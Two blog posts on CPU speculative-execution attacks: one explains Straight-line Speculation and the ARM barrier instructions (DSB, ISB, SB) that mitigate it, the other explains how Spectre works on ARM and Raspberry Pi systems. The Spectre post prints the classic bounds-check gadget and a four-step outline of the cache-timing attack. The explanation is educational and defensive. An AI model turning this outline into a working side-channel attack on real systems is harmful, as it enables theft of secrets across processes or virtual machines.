Stephen Smith's Blog

Musings on Machine Learning…

Posts Tagged ‘spectre

Blocking Speculative Execution Vulnerabilities on ARM Processors

with 4 comments

Introduction

We blogged previously about the Spectre and Meltdown exploits that use the side effects of a CPU’s speculative execution to learn secrets that should be protected. The other day, ARM put out a warning and white paper for another similar exploit called “Straight-line Speculation”. Spectre and Meltdown took advantage of branch prediction, this is the opposite case where the processor’s speculation mechanism continues on past an unconditional branch instruction.

These side-channel attacks are hard to set up and exploit, but the place where they are most dangerous is in virtual environments, especially in the cloud. This is since it is a case where data leaks from one virtual machine to another and allows you to steal data from another cloud user. Running on a phone or PC isn’t so dangerous, since if you have the ability to run a program, you have way more power to do much more dangerous things, so why bother with this? This means that as ARM is used more often in cloud data centers, they are going to have to be very sensitive to these issues.

Why Does a Processor Do This?

Modern CPU’s process instructions ahead of the current executing instruction for performance reasons. There is capacity for a CPU core to process several instructions simultaneously and if one is delayed, say due to waiting for main memory, other instructions that don’t have a dependency on this can be executed. But why would the processor bother to process instructions after an unconditional branch? Afterall, ARM added the return (RET) instruction to their 64-bit instruction set so that the CPU would know where execution continued next and the pipeline wouldn’t need to be flushed.

First, ARM provides reference designs, and many manufacturers like Apple, take these and improve on them. This means that not all ARM processors work the same in this regard. Some might use a simpler brute-force approach that doesn’t interpret the instructions at all, others may add intelligence and their speculative pipeline interprets instructions and knows how to follow unconditional branches. The smarter the approach and the more silicon is required to implement it and possibly more heat is generated as it does its job.

The bottom line is that not all ARM processors will have this problem. Some will have limited pipelines and are safe, others interpret instructions and are safe. Then a few will implement the brute-force approach and have the vulnerability. The question then: what needs to be done about this?

ARM Instructions to Mitigate the Problem

Some ARM processors let you turn off speculative execution entirely. This is a very heavy handed approach and terrible for performance. This may make sense in some security sensitive situations, but usually is too heavy a hit on performance. The other approach is to use a number of ARM Assembly Language instructions that will halt speculative execution when encountered. Let’s look at them:

  • Data Synchronization Barrier (DSB): completes when all instructions before this instruction complete.
  • Data Memory Barrier (DMB): ensures that all explicit memory accesses before the DMB instruction complete before any explicit memory accesses after the DMB instruction start.
  • Instruction Synchronization Barrier (ISB): flushes the pipeline in the processor, so that all instructions following the ISB are fetched from cache or memory, after the ISB has been completed.
  • Speculation Barrier (SB): bars speculation of any instructions after this one, until after it is executed. Note: this instruction is optional and not available on all processors.
  • Clear the cache (MSR and SYS): using these instructions you can clear or invalidate all or part of the cache. However, these are privileged instructions and invalid from user space. Generally, these instructions are only used in the operating system kernel.

The various ARM security whitepapers have recommendations on how to use these instructions and the various developer tools like GCC and LLVM have compiler options to add these instructions to your code.

Adding a DSB/ISB instruction pair after an unconditional branch won’t affect the execution performance of your program, but it will increase the program size by 64-bits (two 32-bit instructions) after each unconditional branch. The recommendation is to only turn on the compiler options to generate this extra code in routines that do something sensitive like handling passwords or user’s sensitive data. Linux Kernel developers have to be cognizant of these issues to ensure kernel data doesn’t leak.

If you are playing with a Raspberry Pi, you can add the DSB, DMB and ISB instructions and run them in user mode. If you add an SB instruction then you need to add something like “-march=armv8.2-a+sb” to your as command line. The Broadcom ARM processor used in the Pi doesn’t support this instruction, so you will get an “Illegal Instruction” error when you execute it.

Ideally, this should all be transparent to the programmer. Future generations of the ARM processor should fix these problems. These instructions were added so systems programmers can address security problems as they appear. Without these tools, there would be no remedy. Addressing the current crop of speculative execution exploits, doesn’t guarantee that new ones won’t be discovered in the future. Its a cat and mouse, or whack-a-mole type game between hackers and security professionals. The next generation of chips will be more secure, but then the ball is in the hackers court.

Summary

It’s fascinating to see how hackers can exploit the smallest side-effect in programs or hardware to either take control of a system or to steal data from it. These recent exploits show how security has to be taken seriously in all design aspects, whether hardware, microcode, system software or user applications. As new attacks are developed, everyone has to scurry to develop workarounds, solutions and mitigations. In this cat and mouse world, there is no such thing as absolute security and everyone has to be aware that there are always risks if you are attached to a network.

If you are interested in these sorts of topics, be sure to check out my book: Programming with 64-Bit ARM Assembly Language.

Written by smist08

June 12, 2020 at 5:13 pm

Spectre Attacks on ARM Devices

with 2 comments

Introduction

I predicted that 2018 would be a very bad year for data breaches and security problems, and we have already started the year with the Intel x86 specific Meltdown exploit and the Spectre exploit that works on all sorts of processors and even on some JavaScript systems (like Chrome). Since my last article was on Assembler programming and most of these type exploits are created in Assembler, I thought it might be fun to look at how Spectre works and get a feel for how hackers can retrieve useful data out of what seems like nowhere. Spectre is actually a large new family of exploits so patching them all is going to take quite a bit of time, and like the older buffer overrun exploits, are going to keep reappearing.

I’ve been writing quite a bit about the Raspberry Pi recently, so is the Raspberry Pi affected by Spectre? After all it affects all Android and Apple devices based on ARM processors. The main Raspberry Pi operating system is Raspbian which is variant of Debian Linux optimized for the Pi. A recent criticism of Raspbian is that it is still 32-Bit. It turns out that running the ARM in 32-bit mode eliminates a lot of the Spectre attack scenarios. We’ll discuss why this is in the article. If you are running 64-Bit software on the Pi (like running Android) then you are susceptible. You are also susceptible to the software versions of this attack like those in JavaScript interpreters that support branch prediction (like Chromium).

The Spectre hacks work by exploiting how processor branch prediction works coupled with how data is cached. The exploits use branch prediction to access data it shouldn’t and then use the processor cache to retrieve the data for use. The original article by the security researchers is really quite good and worth a read. Its available here. It has an appendix at the back with C code for Intel processors that is quite interesting.

Branch Prediction

In our last blog post we mentioned that all the data processing assembler instructions were conditionally executed. This was because if you perform a branch instruction then the instruction pipeline needs to be cleared and restarted. This will really stall the processor. The ARM 32-bit solution was good as long as compilers are good at generating code that efficiently utilize these. Remember that most code for ARM processors is compiled using GCC and GCC is a general purpose compiler that works on all sorts of processors and its optimizations tend to be general purpose rather than processor specific. When ARM evaluated adding 64-Bit instructions, they wanted to keep the instructions 32-Bit in length, but they wanted to add a bunch of instructions as well (like integer divide), so they made the decision to eliminate the bits used for conditionally executing instructions and have a bigger opcode instead (and hence lots more instructions). I think they also considered that their conditional instructions weren’t being used as much as they should be and weren’t earning their keep. Plus they now had more transistors to play with so they could do a couple of other things instead. One is that they lengthed the instruction pipeline to be much longer than the current three instructions and the other was to implement branch prediction. Here the processor had a table of 128 branches and the route they took last time through. The processor would then execute the most commonly chosen branch assuming that once the conditional was figured out, it would very rarely need to throw away the work and start over. Generally this larger pipeline with branch prediction lead to much better performance results. So what could go wrong?

Consider the branch statement:

 

if (x < array1_size)
    y = array2[array1[x] * 256];


This looks like a good bit of C code to test if an array is in range before accessing it. If it didn’t do this check then we could get a buffer overrun vulnerability by making x larger than the array size and accessing memory beyond the array. Hackers are very good at exploiting buffer overruns. But sadly (for hackers) programmers are getting better at putting these sort of checks in (or having automated or higher level languages do it for them).

Now consider branch prediction. Suppose we execute this code hundreds of times with legitimate values of x. The processor will see the conditional is usually true and the second line is usually executed. So now branch prediction will see this and when this code is executed it will just start execution of the second line right away and work out the first line in a second execution unit at the same time. But what if we enter a large value of x? Now branch prediction will execute the second line and y will get a piece of memory it shouldn’t. But so what, eventually the conditional in the first line will be evaluated and that value of y will be discarded. Some processors will even zero it out (after all they do security review these things). So how does that help the hacker? The trick turns out to be exploiting processor caching.

Processor Caching

No matter how fast memory companies claim their super fast DDR4 memory is, it really isn’t, at least compared to CPU registers. To get a bit of extra speed out of memory access all CPUs implement some sort of memory cache where recently used parts of main memory are cached in the CPU for faster access. Often CPUs have multiple levels of cache, a super fast one, a fast one and a not quite as fast one. The trick then to getting at the incorrectly calculated value of y above is to somehow figure out how to access it from the cache. No CPU has a read from cache assembler instruction, this would cause havoc and definitely be a security problem. This is really the CPU vulnerability, that the incorrectly calculated buffer overrun y is in the cache. Hackers figured out, not how to read this value but to infer it by timing memory accesses. They could clear the cache (this is generally supported and even if it isn’t you could read lots of zeros). Then time how long it takes to read various bytes. Basically a byte in cache will read much faster than a byte from main memory and this then reveals what the value of y was. Very tricky.

Recap

So to recap, the Spectre exploit works by:

  1. Clear the cache
  2. Execute the target branch code repeatedly with correct values
  3. Execute the target with an incorrect value
  4. Loop through possible values timing the read access to find the one in cache

This can then be put in a loop to read large portions of a programs private memory.

Summary

The Spectre attack is a very serious new technique for hackers to hack into our data. This will be like buffer overruns and there won’t be one quick fix, people are going to be patching systems for a long time on this one. As more hackers understand this attack, there will be all sorts of creative offshoots that will deal further havoc.

Some of the remedies like turning off branch prediction or memory caching will cause huge performance problems. Generally the real fixes need to be in the CPUs. Beyond this, systems like JavaScript interpreters, or even systems like the .Net runtime or Java VMs could have this vulnerability in their optimization systems. These can be fixed in software, but now you require a huge number of systems to be patched and we know from experience that this will take a very long time with all sorts of bad things happening along the way.

The good news for Raspberry Pi Raspbian users, is that the ARM in the older 32-Bit mode isn’t susceptible. It is only susceptible through software uses like JavaScript. Also as hackers develop these techniques going forwards perhaps they can find a combination that works for the Raspberry, so you can never be complacent.

 

Written by smist08

January 5, 2018 at 10:42 pm